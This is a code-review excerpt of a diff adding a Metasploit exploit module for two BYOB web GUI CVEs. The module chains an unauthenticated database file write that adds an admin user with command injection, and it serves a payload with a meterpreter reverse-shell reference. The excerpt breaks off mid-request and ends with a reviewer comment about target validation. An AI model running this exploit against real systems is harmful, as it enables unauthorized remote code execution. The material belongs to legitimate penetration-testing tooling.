modules/exploits/unix/webapp/byob_unauth_rce.rb

```diff
@@ -0,0 +1,367 @@
+        'Description' => %q{
+          This module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI:
+          1. CVE-2024-45256: Unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user.
+          2. CVE-2024-45257: Authenticated command injection in the payload generation page.
+
+          These vulnerabilities remain unpatched.
+        },
+        'Author' => [
+          'chebuya', # Discoverer and PoC
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-45256'],
+          ['CVE', '2024-45257'],
+          ['URL', 'https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => %w[ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'Privileged' => true
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DisclosureDate' => '2024-08-15',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'SRVPORT' => 5000 },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username for new admin', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for new admin', nil])
+      ]
+    )
+  end
+
+  def primer
+    add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })
+    print_status('Payload is ready at /')
+  end
+
+  def on_request_uri_payload(cli, request)
+    handle_request(cli, request, payload.encoded)
+  end
+
+  def handle_request(cli, request, response_payload)
+    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")
+
+    case request.uri
+    when '/'
+      print_status("Sending response to #{cli.peerhost} for /")
+      send_response(cli, response_payload)
+    else
+      print_error("Request for unknown resource: #{request.uri}")
+      send_not_found(cli)
+    end
+  end
+
+  def check
+    random_data = Rex::Text.rand_text_alphanumeric(32)
+    random_filename = Rex::Text.rand_text_alphanumeric(16)
+    random_owner = Rex::Text.rand_text_alphanumeric(8)
+    random_module = Rex::Text.rand_text_alphanumeric(6)
+    random_session = Rex::Text.rand_text_alphanumeric(6)
+
+    form_data = {
+      'data' => random_data,
+      'filename' => random_filename,
+      'type' => 'txt',
+      'owner' => random_owner,
+      'module' => random_module,
+      'session' => random_session
+    }
+
+    res = send_request_cgi({
```

Comment:
Before making this request and having the logic fall through to detect any HTTP 500 response as vulnerable, there should probably be something located here to validate that the target is the service that we think it is. Doing some kind of banner grabbing based on the header or returned HTML would do the trick.